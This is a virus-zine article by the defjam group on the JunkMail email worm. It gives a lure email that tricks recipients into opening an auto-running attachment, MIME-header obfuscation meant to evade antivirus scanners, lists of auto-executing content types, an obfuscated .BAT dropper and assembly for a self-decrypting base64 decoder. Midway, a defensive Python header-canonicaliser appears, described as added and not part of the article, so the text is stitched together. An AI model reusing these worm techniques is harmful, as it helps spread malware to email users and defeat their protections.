29a-7.009
The Ins and Outs of JunkMail
roy g biv / defjam
RT Fishel / defjam
-= defjam =-
since 1992
bringing you the viruses of tomorrow
today!
About the authors:
roy g biv: former DOS/Win16 virus writer, author of several virus families,
including Ginger (see Coderz #1 zine for terrible buggy example, contact me
for better sources ;), and Virus Bulletin 9/95 for a description of what they
called Rainbow. Co-author of world's first virus using circular partition
trick (Orsam, coded with Prototype in 1993). Designer of world's first XMS
swapping virus (John Galt, coded by RT Fishel in 1995, only 30 bytes stub, the
rest is swapped out). Author of world's first virus using Thread Local
Storage for replication (Shrug, see Virus Bulletin 6/02 for a description, but
they call it Chiton), world's first virus using Visual Basic 5/6 language
extensions for replication (OU812), world's first Native executable virus
(Chthon), and world's first virus using process co-operation to prevent
termination (Gemini). Author of various retrovirus articles (eg see Vlad #7
for the strings that make your code invisible to TBScan). Went to sleep for a
number of years. This is my sixth virus for Win32. It is the world's first
virus using polymorphic SMTP headers.
I'm also available for joining a group. Just in case anyone is interested. ;)
RT Fishel: I don't write viruses, I write code for people to use in their viruses.
JunkMail brings you some new techniques for e-mail spreading. If you read
RFC 822 carefully, you will see a description of the comments that are allowed
to appear in headers. These comments must be enclosed in () characters and
can contain any characters in the ISO-8859-1 character set. If you use these
comments to obfuscate the MIME headers, then you might bypass some AV e-mail
scanners. :)
Here is an example JunkMail e-mail before obfuscation:
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=WIFVHABY
--WIFVHABY
I received this file from you yesterday evening.
I think it was sent without you knowing by the Aliz virus.
The filename was changed but it looked like an important video inside.
You should look at this file to see what it is.
The attachment might open automatically. This is normal behaviour.
If you see a prompt to Open or Save the email then choose Open.
If the attachment is blocked by Outlook 2002 then see
http://support.microsoft.com/support/kb/articles/q290/4/97.asp
--WIFVHABY
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<IFRAME SRC=3DCID:EMAIL WIDTH=3D0>
--WIFVHABY
Content-Type: audio/x-ms-wax;
name=email.com
Content-Transfer-Encoding: base64
Content-ID: <EMAIL>
[base64 encoded file]
--WIFVHABY
--
Here is an example JunkMail e-mail after obfuscation:
MIMe-vERSioN: 1(*T).0
COntEnT-TyPe: (<!)mU(3)l(/)TIp(*)aRT(!)/M(;)i(^)X(eCz)E(/`x)d;
(,#?)Bo(8l)uN(_)Da(*F)Ry=WIFVHABY
XXEMEDWSIUKZTCJYCBTCRRBYFLUICTWOURLFJDDRB
EIQFPJJEAHOGZWSZYFPEXNSOSBDJNHURTQTRRIBLUPYXIPFWBXJNBOQVLSMJ
GJHZF
KKTKYGEHWHUZTXWBGKDFCIJBCMGBZBFEDMVLYDURSRTXNOXGLJYTGVEPW
GFVEVLCJ
WIFVHABY--
--WIFVHABY
I received this file from you yesterday evening.
I think it was sent without you knowing by the Aliz virus.
The filename was changed but it looked like an important video inside.
You should look at this file to see what it is.
The attachment might open automatically. This is normal behaviour.
If you see a prompt to Open or Save the email then choose Open.
If the attachment is blocked by Outlook 2002 then see
http://support.microsoft.com/support/kb/articles/q290/4/97.asp
--WIFVHABY
coNTent-TYPE: (6{)t(=`)e(x-1)xt(bU)/hT(w)ML
coNtEnT-TRANSFEr-ENCoDING: Qu(ZYT)OT(0&y)E(DBZ)d(a)-(_)PRi(p9Q)N(|N)TaBlE
=3CIF=52A=4DE =53RC=3D=43I=44=3A=45MAIL =57=49=44T=48=3D=30=3E
--WIFVHABY
ConTeNt-TYpe: (~S)A(I8t)U(w)D(y:,)Io/(JP)x-M(,)s-w(J)A(+)X(8);
(')Nam(|lz)E(oJ_)=(M#g)e(NO>)m(J)a(6U)il(b#).c(lp')o(Eh)M
ConTenT-tRaNSFER-eNCoDiNG: bA(@h)se(*)64
coNtENt-iD: <(wFe)EM(gq6)ai(*)L>
[base64 encoded file]
--WIFVHABY
OIALNKVLKBDYHURLTQQGRACSXCSGLWKJVSDROSQBJOXYMYAFRFQJGKA
VBJLPEZQDTRVIXV
AHAVZF
ABCAYMKUVCZERXGK
MCKSRAHQVCJVFYZJGTRUHRJQXPNUWJRRJCRTGCOFCRWNRNKYGAXT
NEWUHSRTHFEIWGHMMELC
PQJQLUYEBRTOPMMUEIZYEXAITLRBJOTVLMFZIZTUTSVILGZQQSKODLBCIKW
VADMWVJEXMGWEPAJIVBEXBQQESSCWMQVSUZXVOMLGATIUKIJCCZRZZQSF
FPGMSXAG
--
Wow! :)
So this is our first step, but it is not enough for us. We want to do more.
After some research, we found all of the MIME Content Types that can run
automatically. It is not just audio/x-wav, you know? Here they are:
application/x-mplayer2
audio/aiff
audio/mid
audio/midi
audio/mpeg
audio/x-mid
audio/x-midi
audio/x-mpegurl
audio/x-ms-wax
audio/x-ms-wma
audio/x-wav
midi/mid
video/msvideo
video/quicktime
video/x-ivf
video/x-mpeg
video/x-mpeg2a
video/x-ms-asf
video/x-ms-asf-plugin
video/x-ms-wm
video/x-ms-wmv
video/x-ms-wvx
Then with more research, we found another thing: Content Types that display
the CID instead of the filename! The user will see a prompt this time, but
if the CID has a non-suspicious name, then the user might let it run. It
seems that no-one knew about this. Here they are:
application/futuresplash
application/hta
application/x-shockwave-flash
text/x-scriptlet
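A scanner that matches the raw header text will miss everything above, so the defensive counterpart is to canonicalise headers before any rule runs. The following Python is an added example, not code from the article or from defjam: it strips RFC 822 comments (nesting, quoted strings and backslash quoted-pairs honoured), unfolds continuation lines, lowercases field names and media types, decodes the quoted-printable body line, and checks each part's media type against the two lists above. The sample headers are the article's obfuscated ones re-typed as constructed strings; the folded continuation lines are given the leading space that the zine's text lost, and the verdict labels are my own.

```python
import quopri
import re

# Media types the article reports as auto-running in the mail client
# (copied from the article's own list).
AUTO_RUN_TYPES = frozenset({
    "application/x-mplayer2", "audio/aiff", "audio/mid", "audio/midi",
    "audio/mpeg", "audio/x-mid", "audio/x-midi", "audio/x-mpegurl",
    "audio/x-ms-wax", "audio/x-ms-wma", "audio/x-wav", "midi/mid",
    "video/msvideo", "video/quicktime", "video/x-ivf", "video/x-mpeg",
    "video/x-mpeg2a", "video/x-ms-asf", "video/x-ms-asf-plugin",
    "video/x-ms-wm", "video/x-ms-wmv", "video/x-ms-wvx",
})
# Media types the article reports as prompting with the Content-ID, not the filename.
CID_PROMPT_TYPES = frozenset({
    "application/futuresplash", "application/hta",
    "application/x-shockwave-flash", "text/x-scriptlet",
})


def strip_comments(text):
    """Remove RFC 822 comments: '(' ... ')' may nest, a "quoted string" is
    literal, and a backslash quotes the next character."""
    out, depth, in_quote, i = [], 0, False, 0
    while i < len(text):
        ch = text[i]
        if ch == "\\" and i + 1 < len(text):
            if depth == 0:
                out.append(text[i:i + 2])   # keep a quoted-pair outside comments
            i += 2
            continue
        if in_quote:
            out.append(ch)
            in_quote = ch != '"'
        elif depth == 0 and ch == '"':
            out.append(ch)
            in_quote = True
        elif ch == "(":
            depth += 1
        elif ch == ")" and depth > 0:
            depth -= 1
        elif depth == 0:
            out.append(ch)
        i += 1
    return "".join(out)


def unfold(raw):
    """Join folded continuation lines (leading SP/HTAB) onto the previous line."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    return lines


def canonical_headers(raw):
    """Map lowercase field name -> comment-free, whitespace-collapsed value."""
    headers = {}
    for line in unfold(raw):
        clean = strip_comments(line)      # strip first: comments may hide ':' or ';'
        if ":" not in clean:
            continue
        name, value = clean.split(":", 1)
        headers[name.strip().lower()] = re.sub(r"\s+", " ", value).strip()
    return headers


def parse_content_type(value):
    """Split 'type/subtype; p=v' into (lowercase media type, {lowercase param: value})."""
    fields = [f.strip() for f in value.split(";")]
    params = {}
    for field in fields[1:]:
        if "=" in field:
            key, val = field.split("=", 1)
            params[key.strip().lower()] = val.strip().strip('"')
    return fields[0].lower(), params


def classify_part(raw_headers):
    """Return (media type, params, transfer encoding, verdict) for one MIME part."""
    h = canonical_headers(raw_headers)
    media, params = parse_content_type(h.get("content-type", ""))
    if media in AUTO_RUN_TYPES:
        verdict = "auto-run"            # article's list: opens with no prompt
    elif media in CID_PROMPT_TYPES:
        verdict = "cid-prompt"          # article's list: prompt shows the CID
    else:
        verdict = "ok"
    return media, params, h.get("content-transfer-encoding", "").lower(), verdict


def decode_qp(line):
    """Decode a quoted-printable body line so '=3C'-style escapes become plain text."""
    return quopri.decodestring(line.encode("ascii")).decode("latin-1")


# Constructed samples: the article's obfuscated headers, re-typed with the
# leading space that marks a folded continuation line.
TOP_HEADERS = (
    "MIMe-vERSioN: 1(*T).0\n"
    "COntEnT-TyPe: (<!)mU(3)l(/)TIp(*)aRT(!)/M(;)i(^)X(eCz)E(/`x)d;\n"
    " (,#?)Bo(8l)uN(_)Da(*F)Ry=WIFVHABY\n"
)
HTML_PART = (
    "coNTent-TYPE: (6{)t(=`)e(x-1)xt(bU)/hT(w)ML\n"
    "coNtEnT-TRANSFEr-ENCoDING: Qu(ZYT)OT(0&y)E(DBZ)d(a)-(_)PRi(p9Q)N(|N)TaBlE\n"
)
AUDIO_PART = (
    "ConTeNt-TYpe: (~S)A(I8t)U(w)D(y:,)Io/(JP)x-M(,)s-w(J)A(+)X(8);\n"
    " (')Nam(|lz)E(oJ_)=(M#g)e(NO>)m(J)a(6U)il(b#).c(lp')o(Eh)M\n"
    "ConTenT-tRaNSFER-eNCoDiNG: bA(@h)se(*)64\n"
    "coNtENt-iD: <(wFe)EM(gq6)ai(*)L>\n"
)
QP_BODY = "=3CIF=52A=4DE =53RC=3D=43I=44=3A=45MAIL =57=49=44T=48=3D=30=3E"

if __name__ == "__main__":
    print(canonical_headers(TOP_HEADERS))
    print(classify_part(HTML_PART), decode_qp(QP_BODY))
    print(classify_part(AUDIO_PART))
```

Stripping comments before splitting on the colon matters: a comment such as (y:,) in the sample would otherwise be taken as the name/value separator. Parameter values (the boundary, the attachment name) are left in their original case, since only field names, media types and parameter names are case-insensitive.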
We use EMAIL for the CID, so the user opens the e-mail and then sees a prompt
to open EMAIL. :)
And still it is not enough for us. We also use a random choice of file content
(not only the extension). We can choose between a .BAT file, a Windows
executable file, and an OLE2 scrap file.
The .BAT file drops an executable ASCII .COM file that contains a new base64
decoder algorithm that does not need any character dictionary. Here is a
description of that by RT Fishel:
The .BAT file dropper had to be compatible with RFC 1521 mail, it had to be
compatible with .BAT files for all Windows versions, and it had to be
compatible with ISO 8859 (0x20-0x7e only) to avoid troubles with DBCS
codepages. RFC 1521 mail has a maximum line length of 76 characters (not
including CRLF) and no = (0x3d) characters unless at the end of a line or
encoded as an uppercase octet (=3D). Long lines are continued by ending the
line with an = character, and .BAT files must not contain any of these
characters: " (0x22 (NT/2000/XP)), & (0x26), < (0x3c), > (0x3e), | (0x7c).
Also, % (0x25) must be %% (all platforms) and ^ (0x5e) must be ^^ under
NT/2000/XP. All of these conditions made it very difficult to write. :)
So we begin:
@ECHO OFF no screen output
SET %R=^^^^ must default to NT/2000/XP (result is %R%=^^)
IF NOT %OS%T==T GOTO F OS is defined for NT/2000/XP so we skip next line
SET %R=^ because this line executes correctly only under 9x/Me
:F
But of course we obfuscate that code, too. Here is an example of that:
@EC=48O =4FFF
=53=45=54 %=52=3D^^=5E^
I=46 NO=54 %O=53%=54=3D=3DT =47O=54=4F =46
SE=54 =25R=3D=5E
:=46
--
Then we initialise the decryptor (this is executable ASCII code):
pop ax                                          ax = 0
push ax                                         return address (-> int 20h)
dec ax                                          ax = ffffh
aaa                                             ax = 105h
xor al, (offset b64_outer + 1 - 105h) and 0ffh
push ax
pop si                                          si -> encrypted buffer
xor ax, (offset b64_outer + 1) xor '00'         ah = '0' (8-bit decryption key)
push ax
pop bp                                          bp = '00' (16-bit decryption key)
and decrypt the decoder:
sub [si + 21], ah                               decrypt push (76 shr 2) + 1
sub [si + 27], ah                               decrypt je b64_newline
sub [si + 29], si + sub [si + 29], ah           decrypt lods dword ptr [esi]
sub [si + 2b], ah                               decrypt push 4
sub [si + 2e], si + sub [si + 2f], si           decrypt rol eax, 8
sub [si + 30], bp                               decrypt cmp al, '0'
sub [si + 34], bp                               decrypt jnb b64_testchar
sub [si + 36], si                               decrypt add al, (('/' shl 2) + 1) and 0ffh
sub [si + 37], si + sub [si + 38], si